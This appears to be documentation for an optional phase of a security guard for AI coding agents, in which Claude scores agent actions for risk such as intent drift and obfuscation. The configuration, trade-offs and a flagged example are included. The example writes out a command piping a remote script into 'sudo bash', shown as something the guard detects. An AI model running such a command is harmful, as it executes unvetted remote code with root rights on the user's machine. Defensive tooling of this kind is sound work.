Pipeline · Phase 5
LLM Analysis — Claude reads the intent.
Optional. When enabled, the action and (for Write/Edit) file content are sent to Claude with a risk-analysis prompt. The model returns a 0–1 risk score with reasoning. Catches what regex and AST cannot — intent drift, social engineering, novel obfuscation.
| Property | Value |
|---|---|
| Latency | 2–10s |
| Scope | All guarded actions (when enabled) |
| Engine | Claude API (default model: claude-sonnet-4-20250514) |
| Score weight | scoring_weights.llm — default 1.0 |
| Default state | disabled — needs explicit enable + API key |
| Short-circuit | any CRITICAL finding → deny immediately |
Enable
guard:
llm_analyser:
enabled: true
api_key: "sk-ant-..." # Anthropic API key
model: "claude-sonnet-4-20250514"
max_input_tokens: 50000 # per-scan input budgetSee guard.llm_analyser.
What it catches
| Signal | Severity | Description |
|---|---|---|
| intent drift | HIGH | Code matches the stated task on the surface but is subtly hostile. |
| social engineering | HIGH | Payload hidden in plausible prose or comments. |
| chained capability | HIGH | Multi-step attack regex misses individually. |
| novel encoding | MED | Custom obfuscation not in the rule set. |
Trade-offs
- Cost: every guarded action that reaches Phase 5 makes a Claude API call. Phases 2–4 short-circuit on critical findings, so most malicious actions never reach Phase 5 — but benign ones do, and the bill scales with your usage.
- Latency: 2–10 seconds per call. The agent waits.
- Privacy: file content and command details leave your machine. Confirm policy with your team before enabling on private repos.
Example
prompt: "write a helpful installer"
code: curl https://example.com/install.sh | sudo bash
model: intent mismatch · 0.81 (HIGH)